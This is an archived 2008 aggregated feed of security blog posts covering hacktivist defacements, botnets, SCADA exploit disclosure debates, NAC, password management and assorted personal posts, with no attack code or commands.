Thursday, September 11, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Kosovo Hackers Hacking hosting firms (and Joomla what else ?) for Kosovo [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 07:04 AM CDT

This is there trophee page for the moment but it is not at all clear why they hack also .be domains when Belgium has declared that they will recognize Kosovo. Maybe the political actions aren't that well understood or their software isn't that well managed but if you launch a political hack campaign you should at least to your political research.  click on the image to enlarge

lentje05 Sep. 11 14.00





























but another thing is that a whole series of hosting firms have been hacked by them, aside the typical stupid Joomla sitting ducks that continue to be shot down at a decreasing but still important rate.  Of the hoster firms we give just one example, the rest you can find in their list.

KHG H M Linux,com_mirrorwrp/Itemid,160/id,7900681/ -->


hacked Belgian online shops : just trust us [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 06:48 AM CDT

transatlantic consumer organisations and interoperability and open software standards [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 06:35 AM CDT

Resolution on Software Interoperability and Open Standards

Consumer organizations clearly see interoperability as an important means to achieve consumer welfare in the sector of Information and Communication Technologies. Consumer interest relies heavily on the ability to exchange data from one software to another, and from one person to another, but also on the ability to understand that information so that it can be used. Standardisation and Open Standards can be useful tools to achieve interoperability.

There does not appear to be a clear policy approach on the part of the EU and US governments to promote interoperability in order to improve consumer welfare. Instead, efforts to develop interoperability tend to be left to market players. While this may be a valid policy approach in some emerging services, it requires rigorous and ongoing assessment to determine whether the market has delivered the necessary interoperable environment to serve the needs of consumers and the social welfare.


The Status of Recent Research Concerning Data Breaches and Reputational Risk []

Posted: 11 Sep 2008 06:00 AM CDT

Nearly three years ago, Ken Belva wrote a paper intended to be a “starting point for further, positive discussion” regarding the topic of data breaches and reputational risk.  The title of the paper also presented Ken’s major theme:  “How It’s Difficult to Ruin a Good Name:  An Analysis of Reputational Risk.”

The paper analyzed trends associated with stock prices of several prominent retail and financial services corporations that had experienced well publicized data breaches.  Ken concluded that, for these organizations, the announcement of a breach was usually followed by a brief dip in the closing price of a company’s stock, quickly followed by a sustained rise.  Ken interpreted this counterintuitive finding as evidence that a data breach does not necessarily pose a reputational risk to an organization, as long as (1) there is no sustained pattern of similar breaches experienced by the company and (2) the organization’s primary business does not involve providing a service where information security is an integral element.  Polo Ralph Lauren and Citigroup-two of the companies discussed in Ken’s study-are not selling security as a major service; ChoicePoint, however, offers security controls as an essential feature of its product.

Ken’s thesis was validated when, in January 2007, TJX (the parent company for Marshall’s, TJ Maxx, and other retail establishments) announced the unauthorized disclosure of credit card data concerning millions of customers.  The breach was announced on January 17.  That day, TJX closed at $29.63, down .22 from the previous day.  On the next day, the stock fell an additional .13.  However, two days following the breach announcement, TJX shares closed at $30.03, a .40 rise since the announcement.

Read the rest of The Status of Recent Research Concerning Data Breaches and Reputational Risk (1,263 words)

© Sam Dekay for, 2008. | Permalink | No comment
Want more on these topics ? Browse the archive of posts filed under General.

This feed is copyrighted by The feed may be syndicated only with our permission. If you feel that this feed is being syndicated by a website other than through us or one of our partners, please contact immediately at Thank you!

Belgium is still not closing its Botnet control centers [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:46 AM CDT

There are have been indications that the number of pc's that have become zombies of a botnet has risen enormously the last month. Probably they are activating the infections that were carried out by the  Storm Worms and the SQL injections that were carried out the last months. As both of these campaigns were rathter successful because the viruses (ex. CNN campaign) were only detected by most of the Antivirus products hours or days after their launch and because the SQL injections in the sites were only removed very slowly it doesn't come as a surprise.

But those zombies are only very dangerous if they are actually controlled by a Control center that send them instructions. The owner of the PC won't see a thing because those zombies are used in such a way that the user don't see a thing so he doesn't start cleaning and protecting his machine.

Belgium is one of the countries that has the most problem with closing down and cleaning up those botnet control centers. THe numbers reinforce the demand for an active CERT that can take this problem and organize the response to it.

numbers are from Shadowserver and are just a small part of the problem, the numbers are only based on what their honeypots see

lentje01 Sep. 11 12.39

The use of vulnerable CITECscada in Belgium [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:33 AM CDT

There will be vulnerable CITECScada critical infrastructure in Belgium because there are several firms that have installed and deployed it. We can only hope that they have patched and investigated their systems and are having a close watch on their logfiles to be sure that all attacks are stopped. The problem maybe that those metasploit attacktools are finding other vulnerabilities on other parts of the infrastrucutre that can have the same effect.

There are also some small and medium enterprises that are using this software and here the problem could be that they don't have the necessary knowledge and monitoring contracts to be sure that they are patched.

It is not up to me here to write the names of the firms that use that software but it is about time that maybe the firms that installed that software in those firms call those firms to be sure that they are patched even if they don't have a contract (yet) so that there is nothing bad going to happen to their clients.

Critiical infrastructure is actually under heavy attack now [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:23 AM CDT

When we talk about SCADA it isn't about a car but about the IT infrastructure in our electrical, gas and other utilities infrastructure that monitors and organizes those installations. Most of that software and hardware has been developed years ago and has always more or less had the feelings that they weren't connected to the internet and couldn't be attacked an sich. Many of those installations that weren't meant to be connected to the internet have now internet connection points to make life easy for the IT guys without imaging everything that is possible and their consequences.

It is a small risk they took but just as the financial credit guys, they couldn't imagine the consequence if something went wrong as Murphy is never on holiday and always finds you when you aren't ready for him.

THere was a vulnerability for a certain SCADA software that was published. This isn't so bad, but when people develop exploits based on that vulnerability that can be inserted in automated scanning and attack tools, this changes the whole spectrum of attacks you can see arriving at your networks. Such an exploit plugin has been developed for METASPLOIT and the ports of the software to be attacked have seen a very important rise in use and intensity. THis means that people are in fact looking for vulnerable Crtiical Infrastructure that can be hacked this way. So don't be surprised if in the coming weeks you will read articles about hackers or others having penetrated such critical infrastructure.

You should follow the Internet Storm Center on more news about this issue


MX Lab offers Unified Communications Protection [mxlab - all about anti virus and anti spam]

Posted: 11 Sep 2008 03:05 AM CDT

MX Lab offers Unified Communications Protection based on FaceTime’s Unified Security Gateway (USG) appliance that allows enterprises to communicate and collaborate in a save environment without sacrificing security and control.

Combined with the in house developed and managed MX Lab Zero Hour Anti Virus & Anti Spam services offers an complete solution for your business communication wether it’s email, web, IM, Skype.

Read the press release MX Lab offers Unified Communications Protection at the MX Lab web site

Moving email from the iPhone to Outlook, no can do? [StillSecure, After All These Years]

Posted: 11 Sep 2008 02:11 AM CDT

Sitting here writing this on the plane to Sacramento.  I have a presentation that I am giving tomorrow that was mailed to me this afternoon. It is on my iPhone and I would like to work on it on my computer on the plane.  If I had a windows mobile phone (like I used to) that would be no problem.  When I did an active sync, my mail would sync as well.  Also, I could access all of the files on my windows mobile phone and convert and move them over to my laptop.  However, not that I have a fancy iPhone, no can do.  I could be working on the 4 hour trip on my presentation for tomorrow.  BUT NO! I am blogging my frustrations, while that file I need is trapped on my iPhone with Apple's magic holding the key. I am sure there is some application I could buy or download that would allow me to unlock this file and move it over, but I can't get it while in the air.  So instead I will just keep blogging.

I expected more around integration with Exchange and Outlook from Apple.  They need to do a better job before Microsoft starts running commercials where Bill Gates is a windows mobile phone and Jerry Seinfeld is an iPhone.  Than Bill can really have something to shake about.

Everything I need to know I learned from Sex and the City [StillSecure, After All These Years]

Posted: 11 Sep 2008 02:09 AM CDT

sex-and-the-city-posterComing home on the plane last night I had a chance to catch the "Sex and the City" movie. I admit that I watched the HBO series with my wife and was sorry it ended.  When the movie came out, my wife went with her friends on the first night it opened and I stayed home.  No biggie, I figured it was a chick flick anyway.  So when I saw it as an option on the flight home, I thought it would be a great time to see it for myself.  Within just a few minutes I felt like I was back among old friends.  Carrie, Charlotte, Miranda and Sam - I have watched these girls grow up in NYC.  Of course Mr. Big, Steve, Smith and Harry were there. Aiden and Petrovsky weren't there, but hey I liked those guys too. Tell the truth, which of you have ever watched this show and not found fragments of your personality in these characters.  Be really honest with yourself, which of the characters have you thought you are most like?  I thought so. I am not alone.  Like most of you I have seen myself in multiple characters on the show. Elements of my relationship have been dead on to those on the show.

Now, I have never held myself out as an expert on women and relationships.  As a matter of fact, I have always been a bit slow, truth be told.  Having several friends recently going through breakups of both marriages and long standing relationships, as well as dealing with getting older and not being a 20-something or even a 30 something anymore, this movie really struck home. Watching this movie I was moved to tears and laughter at the same time. It was not over the fashions either.

No, the characters are not real and there is no exact clone of you or me. But collectively there is so much truth and lessons to be learned in this movie and with these characters.  The writers and creators have done an excellent job of staying true to the original show and making a movie that even a somewhat oversensitive guy could truly appreciate!  If you get a chance rent the DVD when it is out.

Now if I can only get my email off that damn iPhone I can get some work done on this plane ride instead of writing about this stuff!

The mystery of Crop Circles solved! [/dev/random] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 01:40 AM CDT

CSRF Vulnerability in Twitter Allows Forced Following [Darknet - The Darkside]

Posted: 11 Sep 2008 12:39 AM CDT

I did mention this earlier in the week when I was talking about Twitter being used as a malware distribution platform, there also seems to be an auto follow vulnerability that spammers would love. Do you remember Myspace and samy with 900,000 friends? Now we have johng77536 on Twitter! Last week, TechCrunch's Jason Kincaid wrote about an [...]

Read the full post at

Cloud Computing and the Internet Integrity Challenge [ARCHIMEDIUS]

Posted: 11 Sep 2008 12:06 AM CDT

Om Malik certainly deserves credit for talking about the vision of cloud computing two years ago, as well as understanding the potential opportunity posed by new relationships between the browser and the service provider in his recent piece in BusinessWeek:   In the meantime, always-on broadband connections at home, work, and on the move have become commonplace. [...]


Posted: 10 Sep 2008 10:40 PM CDT

I’m actually a little disappointed I’m using that word because its the new “hip” word and I usually try to stay away from what all the cool kids are doing.

Yesterday, four of us walked out of our network operations center just before lunch.  Right outside our door sits a male programmer.  As myself and two others walked out to go to lunch I noticed a woman wearing a pink shirt sitting at this guy’s desk in his chair.  Not only was she sitting in his chair she was leaned over plugging something into his computer.  Myself and another guy walked one way to the restroom while the third walked the other way.  Shortly after the three of us walked by this unknown woman a fourth member of our department walked out the same door by this desk and noticed the woman sitting there as well.  NOT A SINGLE ONE OF US SAID A THING TO HER!  As I got to the restroom I realized what I had done and started kicking myself.  On my way back I was going to ask who she was but she was gone.  Luckily she was only plugging in an iPod to charge but the psychological damage was done.  Four “security-minded” people walked by a desk with an unknown person at it and not a single word was said.  Only two of us even noticed she was sitting at a desk a guy usually sits at.  Talk about feeling like an ass clown.

What was the popular catch phrase after 9/11/2001?  Be in a constant state of awareness.

Google's new Browser Chrome: an overview of articles [Security4all] [Belgian Security Blognetwork]

Posted: 10 Sep 2008 07:03 PM CDT

Here is an overview of some of the information published about Google's own browser:
I kind of feel bad for Chrome because since it's release, it seemed people went at it like piranhas. Which is good. A good scrutiny during it's beta phase can help improve it.

It started with denial of service bugs, carpet bombing (the ability to drop files on the user's desktop), EULA discussions etc......

Although some of these issues have already been fixed. There are some things that I don't like at all.
  1. It seems that even after an uninstall of the chrome browser, it leaves a scheduled task behind to run the googleupdate program and the googleupdate.exe itself is also left behind. An uninstall shouldn't leave binaries behind.
  2. If the observation from Mubix is correct, (see Room362 article) Chrome updating itself without any user interaction is just evil. Even the Apple updater allows you to deselect items (like Safari which they seems to keep force feeding to the users.). I wonder if it's vulnerable to something like Evilgrade.
Summary: Wait until it's left the Beta phase for general use and Chrome gets some additional security improvements. Some of it's (security) concepts are good, but they are not there yet.

(Photo under creative commons from aacool's photostream)

Early release of some of the Defcon 16 videos [Security4all] [Belgian Security Blognetwork]

Posted: 10 Sep 2008 06:23 PM CDT

We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats, the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is quicktime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months!
Brenno De Winter - Ticket to Trouble

Dan Kaminsky - DNS Goodness

Anton Kapela and Alex Pilosov - Stealing the Internet

Mike Perry - 365 Day: Active HTTPS Cookie Hijacking

Related posts:
(Photo under creative commons from shootingsawk's photostream)

Simple but dreadful, part 2 - Network shares [Security Balance]

Posted: 10 Sep 2008 04:12 PM CDT

It would be impossible to write about low hanging fruits without mentioning network shares. I say it because they are usually my favorite path to elevate privileges when I’m performing a penetration test. Among stuff that I’ve already found on unprotected (I mean, Everyone - Full Control) shares are:

- Source code for critical applications

- Configuration files of applications containing database credentials (VERY COMMON)

- Configuration files of applications containing Administrator level credentials for servers (service passwords!)

- Debug logs containing a lot of sensitive information and even user credentials (SMS logs!)

- Network and systems documentation (Lot’s of Visio diagrams)

- Personal private information (Human Resources stuff)

Network shares appear and grow on the network like tribbles. The problem starts with weak policies regulating the subject, but it grows when the infrastructure needed as an alternative for non-authorized shares is not available. If you compare companies that have a good file server infrastructure with those that are trying to save some bucks by saving file server megabytes you will notice that the last has a higher occurance of non-authorized file shares. Non-authorized network shares fall in that “Shadow IT” category and are an easy bet for unprotected sensitive information. I can tell from experience that just by browsing network shares you can own an entire network. No need for leet exploits.

If you are just starting as a security manager, include it as one of your first steps: map and control your network shares. You need to know where they are, what is inside and who can access them.

NAC and DLP [Security Balance]

Posted: 10 Sep 2008 03:39 PM CDT

I was reading a comment from Shimel mentioning that NAC technology is becoming more mature every day, as we can see more 3rd party products integration. He mentions the integration of a IPS system, what promptly made me wonder about another kind of security product: DLP.

Have anybody tried to integrate DLP and/or e-Discovery products with NAC? Can you imagine the possibilities? You can build a policy where workstations with protected/sensitive information stored have their connectivity restricted to reduce the chances of data loss. Your computer is free from protected information, you can browse the Internet with more freedom than that guy with sensitive files in his hard disk. I wonder if anyone from Symantec is trying to do that with Vontu and their Endpoint Protection suite.

The Risks of Security Non-Disclosure [Digital Bond]

Posted: 10 Sep 2008 02:59 PM CDT

As there has been a furor of emails on various lists regarding the recent Citect vulnerability Metasploit modules I thought a little discussion of the risk of Non-Disclosure might prove valuable. 

Disclosure and the development of such a modules do increase exposure. An unpatched, unmitigated, and exposed system now becomes ripe for exploitation by script kiddies, which does increase exposure and risk. But what is the risk of an undisclosed vulnerability? 

Does a vulnerability that has not been disclosed not exist? Does the risk suddenly spring into existence because it is published/dissemenated? Of course not. It was there and hidden, and possibly known by someone.

My experience in performing and exposure to the results of software and protocol reviews employed by SCADA and Digital Control systems leads me firmly to the conclusion that these systems are rife with vulnerabilities of the most basic type, namely simple buffer overflows. In my opinion there exist one or more such simple exploits in every product used in our industry, though much has been done to reduce this in the newest and soon to be released products.

The IT side of software development went through these type of growing pains 10 years ago as the knowledge of finding these type of bugs disseminated across the globe. The publication of these flaws does increase exposure and in turn risk, but the disclosure also drives mitigation.

When first contacted about said stack overflow flaw (according to the publicly available timelines) the vendor basically responded with “Meh, we are not going to do anything about it.” It was only as their awareness of the ramifications of the flaw grew, that they took action to mitigate. And they were very slow in doing so. Yes the publication of such a vulnerability does possibly create PR and financial backlash for the vendor, but it does not create the flaw, it already existed and therefore is inherent risk.

To get a better picture of what I am speaking of consider the following video entitled “Did You Know” that I first saw at the DOE CST conference of 2007 (Provided in wmv and mov format). Pay particular attention to the segments that touch on the populations and potential of China and India. China proved in this round of olympics that when you have a population of over 1 billion people, statistically speaking, you have a lot of exceptional people, in any field to choose from (this includes people who make good hackers). The video notes that the 25% of people in China with the highest IQs exceeds the number of total population in North America eg the United States, Canada and Mexico combined and in the vernacular of school teachers, that the number of “honor” type students in China’s educational system exceeds the total number of children in North America.

To think that only one researcher or research group has found a specific 0 day exploit for a control system is to ignore the odds. To think that there are not groups in other nation states sitting upon 0 days is, in the phrasing I have oft used “shear insanity.” The vulnerabilities are remedial at best and very simple to find. The majority of such simple bugs were weeded out of the IT side of things years ago but are still prevelant in the majority of the products that we use to control “Critical Infrastructure.” And as it is critical the risk is that much higher. The recent leak of the firmware vulnerability is a case in point. Everyone with exposure to these systems knew that this was a risk, and no one was surprised by the contents of the briefing.

It seems to me and I think history supports the assertion, that vendors will only move to mitigate when facing immanent disclosure. Hence disclosure drives mitigation. Disclosure does not increase risk as much as non-disclosure, because at least through disclosure awareness is gained and mitigation becomes available.

This is why in hacking circles the undisclosed 0 day is so coveted. There are no mitigations impeding the use of a 0 day exploit. It is the golden key. Due to the ease of finding the flaws in control system software how many “research groups” with good or bad intentions are sitting upon 0 day exploits against critical infrastructure? And if you think the answer is 0 then you live in a different world……

This posting includes an audio/video/photo media file: Download Now

First Beam [Phillip Hallam-Baker's Web Security Blog]

Posted: 10 Sep 2008 12:23 PM CDT

Congratulations to CERN for achieving first beam on the LHC.

I was present at first beam for HERA and LEP. It takes a great deal to make these things work.

Update: Contrary to the claims being made in the popular press, no this is not an atom smasher, it is a proton-proton smasher. No atoms are harmed during this experiment (unless you count ionizing hydrogen atoms in the proton beam generator). No this is not recreating the big bang. Nor was there the slightest chance that this test would have created a mini-black hole that would eat up the earth, the beams never collided. That comes later in the year.

Folk need not worry however as equally energetic collisions are taking place in the upper atmosphere all the time. If 80 GeV electron-proton collision were sufficient to create a stable black hole we would have been eaten up years ago.

Update II: Yes, LEP was an electron-proton smasher, the Large Hadron Collider is just protons. It is actually the same tunnel. My point was that you can accelerate leptons or hadrons with a synchrotron like the ones at DESY or CERN. An atom has no charge, so it is going to be difficult to accelerate. There are still a few atom smashers around, but most of the physics of atoms is known. The LHC is designed to study particles at much smaller scale.

NAC makes for strange bedfellows [StillSecure, After All These Years]

Posted: 10 Sep 2008 12:13 PM CDT

A couple of articles today forced me into an Aha! moment on NAC.  I think you can tell when a technology begins to mature when you see announcements about how the products are working with 3rd party products.  On the other hand I think it also shows what the strengths and weakness of individual vendors are as well.

Two cases in point

1. Bradford announces that it plays well with Top Layer - This press release details how Top Layer IPS can alert Bradford's NAC product to devices on the edge sending out bad traffic.  At that point presumably Bradford would be able to quarantine the offending device.  According to the spin this results in "core to edge" protection

Well this is certainly not new.  Bradford has advertised working with 3rd party IPS's for sometime.  Bradford is not alone in this either.  There are several NAC vendors including StillSecure that can do this.  But is integrating with existing IDS/IPS a post-connect NAC solution?  I don't think so. I don't think it is truly a holistic approach.  All you are doing is sending out a syslog alert and based upon that quarantining a device.  No context, no depth, you are piling on separate solution on top of another separate solution.  While as I have said this integration is not new, we have been working for a long time to take our own IDS/IPS technology and use that as a the basis of a true post-connect NAC sensor.  Integrating the products into a common UI, with common policies, rule sets and management is where the value is. 

A vendor who only has a NAC product that can do pre-connect health checks (which are valuable in and of themselves) but can than only "integrate" by passing data back and forth is going to have a tough time in the maturing NAC space.

2. InfoExpress teams with Alcatel-Lucent - In this story, InfoExpress talk about how they teamed up to deliver to Iona College a secure wireless solution.  Good for InfoExpress, they are often left out of the NAC market discussion, though they have been selling NAC as long as anyone.  What I found surprising is what does this say about Alcatel-Lucent's OEM of ConSentry gear for NAC.  Does this mean Alcatel-Lucent is no longer selling the Consentry NAC solution? What is going on with ConSentry anyway?

One thing for sure is that NAC makes for strange bedfellows.

ThreatLinQ: Movers and Shakers [DVLabs: Blogs]

Posted: 10 Sep 2008 09:30 AM CDT

Posted by Mike Dausin
Alright, it's time for an installment ThreatLinQ: Movers and Shakers. Most every week we will use this space to point out any interesting and or sudden events we may see in the ThreatLinQ data. This week there are a couple of PHP File Include filters which popped up on the movers and shakers page which are worth talking about:

First, Filter 4270 saw a sudden increase in traffic on 9/08/2009.  This was due entirely to a single attacker from New Jersey targeting various PHP file include vulnerabilities. It looks as if this attacker resides at a hosting facility, so it would be a good bet to say this machine has been compromised. Below is a graph of this attacker's activity for the last few days:

A similar story exists for filter 6007. This time however, the IP is located in the Ukraine and appears to be targeting sites in the US and Korea. 

That's it for the Movers and Shakers summary for this week. If you have a TMC account and would like more information about the latest trends be sure to visit the ThreatLinQ portal here:

The two IPs responsible for these attacks are below: - New Jersey U.S.A. - Ukraine

Top 10 security threats for the SMB market [StillSecure, After All These Years]

Posted: 10 Sep 2008 08:05 AM CDT

What is it about top ten lists that attracts bloggers like moths to a flame?  Are we all frustrated David Letterman wannabes?  In any event, I came across this top ten list of security threats to the SMB market. I think that many if not most of these apply to organizations of all sizes actually. I am copying it in here, as I think there is some good stuff here:

- Insiders - In many SMBs, business records and customer information is often entrusted to a single person. Without adequate checks and balances, including network system logs and automated reports, data loss from within can stretch over long periods of time.

- Lack of contingency plans - One of the biggest threats to SMBs relates to the business impact of post-hack, intrusion or virus. Many SMBs lack a data loss response policy or disaster recovery plan, leaving their business slow to recover and restart operations.

- Unchanged factory defaults - Hackers publish and maintain exhaustive lists of default logins (username and password) to nearly every networked device, and can easily take control of network resources if the default factory configuration settings are not changed.

- The unsecured home - in many small businesses, employees often take laptops home to work. In an unsecured home network environment, a business laptop can be dangerously exposed to viruses, attacks and malware applications.

- Reckless use of public networks - A common ruse by attackers is to put up an unsecured wireless access point labeled, 'Free Public WiFi' and simply wait for a connection-starved road warrior to connect. With a packet sniffer enabled, an attacker stealthily sees everything the employee types, and is then able to utilize that data for personal gain.

- Loss of portable devices - much SMB data is compromised every year due to lost laptops, misplaced mobile devices and left behind USB sticks. Although encryption of mobile device data and use of strong passwords would mitigate many of these losses, many SMB users simply fail to secure their mobile devices and data.

- Compromised WebServers - Many SMBs host their own websites without adequate protection, leaving their business networks exposed to SQL injections and botnet attacks.

- Reckless web surfing - Now more than ever, malware, spyware, keyloggers and spambots reside in innocuous looking websites. Employees who venture into ostensibly safe sites may be unknowingly exposing their business networks to extreme threats.

- Malicious HTML e-mail - no longer are attackers sending e-mails with malicious attachments. Today, the threat is hidden in HTML e-mail messages that include links to malicious, booby-trapped sites. A wrong click can easily lead to a drive by download.

- Unpatched vulnerabilities open to known exploits - more than 90 percent of automated attacks try to leverage known vulnerabilities. Although patches are issued regularly, a short staffed SMB may likely fail to install the latest application updates and patches to their systems, leaving them vulnerable to an otherwise easily stopped attack.

Corporate Governance: A Dirty Word or a Dirty Job? []

Posted: 10 Sep 2008 06:00 AM CDT

Corporate governance is in the limelight. No one wanted it, not many embrace it. But it’s here and here to stay, thanks to the horrifying outcomes vis-a-vis criminal activity leading to the failures of Enron, Worldcomm and the likes.

In the newly published anthology, CISO Leadership: Essential Principles for Success [Auerbach Publications, New York, 2008], Robert Coles and Rolf Moulton explore governance as it relates to information security. In chapter 13, entitled “Extending the Enterprise’s Governance Program to Information Risks” the authors provide an eye-opening and somewhat threatening stance:  ”In this litigious age, governance failures could result in damaged careers, shareholder lawsuits or corporate collapse.”

However, because the focus is on compliance with Sarbanes Oxley, Basel II and other knee-jerk regulations, it may be worthwhile to put corporate governance into perspective. The authors position is that it can be leveraged to strengthen information security. Further, since governance is amorphous at best, the authors declare their stance as “Our definition of information security governance is the establishment and maintenance of the control environment to manage the risks relating to the confidentiality, integrity and availability of information and its supporting processes and systems.”

Read the rest of Corporate Governance: A Dirty Word or a Dirty Job? (335 words)

© Micki Krause for, 2008. | Permalink | No comment
Want more on these topics ? Browse the archive of posts filed under CSO/CISO Perspectives.

This feed is copyrighted by The feed may be syndicated only with our permission. If you feel that this feed is being syndicated by a website other than through us or one of our partners, please contact immediately at Thank you!

Skyrails 3D OpenGL visualisation [SOURCE Conference Blog]

Posted: 10 Sep 2008 04:19 AM CDT

Skyrails is a social network (or any graph really) visualization system. It has a built in programming language for processing (as far as visualisation attributes goes) the graph and its attributes. The system is not only aimed at expert users though, because through the scripting languages menus can be built and the system can be used by any users.

The main distinguishing point of the system comes from the built in scripting language, the added flexibility of how to represent attributes (nodes can be binded to planes and spheres based on their attributes) and the scriptability of the user interface system. This makes skyrails ideal for creating presentations targeted at the average users.

skyrails in action:

reDuh - TCP Redirection over HTTP [Darknet - The Darkside]

Posted: 10 Sep 2008 12:57 AM CDT

What Does reDuh Do? reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially What is it for? a) Bob.Hacker has the ability to upload / create [...]

Read the full post at

Keys to the kingdom [Security For All]

Posted: 10 Sep 2008 12:03 AM CDT

You think we’d have gotten past this by now. After all the research, mathematical and technological advancement almost all of our most valuable digital - and ultimately real - assets are protected by one little word. Usually something lame like our dog’s name or favorite team mascot. That’s right, I’m talking about passwords. In spite of efforts by Payment Card Industry (PCI) Security Standards Council and others to promote multi-factor authentication - i.e. some combination of

  • something you know (like a password)
  • something you have (like an access card)
  • something you are (biometrics like fingerprints or retinal scan)

Even most financial institutions can only manage a password and some personal questions (which incidentally is not really multi-factor it’s multiple single-factor, i.e. several things that you know) to authenticate us for the most sensitive and important transactions. And forget about web sites. Everybody wants you to have a password. Presumably a good - and unique - one for each.

By now most people have heard the about the guidelines for good passwords. For example Wikipedia lists the following common guidelines.

Guidelines for strong passwords

Common guidelines for choosing good passwords are designed to make passwords less easily discovered by intelligent guessing:

  • Include numbers, symbols, upper and lowercase letters in passwords
  • Password length should be around 12 to 14 characters
  • Avoid passwords based on repetition, dictionary words, letter or number sequences, usernames, or biographical information like names or dates.

I can see heads start spinning! How in the world can I remember only one 12-14 character password that contains nothing I can remember, and is more or less random? Much less the 50 or so passwords I need for all my web sites and financial stuff? Yeah - that’s a problem. And it’s exacerbated by the fact that as the need for passwords has proliferated, the practicality (i.e. horsepower) of password crackers has improved exponentially. Oh and by the way, to really achieve decent security (i.e. mitigate the threat of exposure) you should really change your passwords at least annually and preferable more often.

Yikes! So how exactly can a person possibly memorize 50 pseudo-random character strings that all change every year? Well, in a nutshell - you can’t. No one can. Well maybe someone with an eidetic memory, but not you or me. There is, however, hope. SecurePuter has a great post on “How to Create and Remember Multiple Secure Passwords” wherein an easy to remember but hard to guess formula is presented that will allow you to calculate what your password is so it removes the randomness and requirement to memorize many different things. It’s a great idea, and be sure to read all of the comments as further refinements are suggested.

Still, if you’re like me and make an actual effort to forget things as soon as possible, this might not be an optimal solution. So how do I manage to remember 50 (or in my case more like 150) dynamic random character strings. It’s easy - I don’t even try. I use a password generator and storage system. There are quite a few good packages out there. The one I use is the open source package Password Safe partly because Bruce Schneier started the project, partly because it runs on all of the platforms I use, partly because it has great encryption but mostly because I’m cheap and it’s free (as in free speech and free beer). I keep my fully encrypted password safe database file on a USB thumb drive so all of my passwords are available on whatever device I’m using - except my iPhone (which is a rant for another time). Basically the way it works is that I make an entry for whatever web site or computer I need a password for and then let it generate one for me. There are all sorts of policy options so you can get insanely long and complex passwords. When I save the new password, it is encrypted using the one and only password I need to remember. That’s it. So not only do I not remember my 150 different passwords, I never knew what they were to begin with. Now there are situations where this kind of password safe mechanism will have an issue, specifically you can run into a race condition with computer logons that require a regularly changing password (e.g. most corporate networks) whereby you must be able to type in the password to log in so that you can get access to the password safe. I get around this by generating a random 12-character password that I can remember for the 90 days that it will be valid. So I guess I really have to remember 2 passwords. But even I can do that. And so can you.

Google SAML Single Sign on vulnerability [Sicurezza Informatica Made in Italy]

Posted: 09 Sep 2008 06:32 PM CDT

Vorrei segnalare il seguente paper frutto di una ricerca dell'Università di Genova,Universidad de Castilla-La Mancha, SAP e Siemens.

La ricerca mi è stata resa nota dal gentilissimo Luca Compagna al quale ho avuto il piacere di dare una mano nella divulgazione della stessa.

La vulnerabilità riscontrata nel servizio Single Sign On di Google Apps, basato sull'archtiettura OASIS SAML 2.0 ha un impatto notevole al di là del nome coinvolto (Google).

E' un esempio di come un architettura per l'autenticazione basata su uno standard de facto riconosciuto a livello internazionale possa presentare delle vulnerabilità a causa della sua (errata) implementazione.
(Copyright immagine: Clareity Consulting)

Single Sign on di Google basandosi su SAML permette una sola autenticazione per poter accedere a servizi diversi appartenenti a domini amministrativi diversi (quindi non solo all'interno di una singola organizzazione). I concetti base sono quelli di Kerberos,per intenderci, da cui SAML eredita alcune caratteristiche introducendone altre e adattandosi all'ambiente web mediante l'utilizzo di XML.

L'advisory è disponibile qui

New Look Coming Soon [Ascension Blog]

Posted: 09 Sep 2008 11:40 AM CDT

We are pleased to announce that there will soon be a new look for the Ascension Risk Management Website.  We engaged the services of a graphic artist to come up with a logo.  This artist also came up with a very nice, simple and straightforward website design for us.   We are going through the final design and content reviews now and hope to have the site up and online within the next two weeks.  (Our blog design will stay the same.)  In the meantime I thought that I'd share with you the new logo. 


No comments: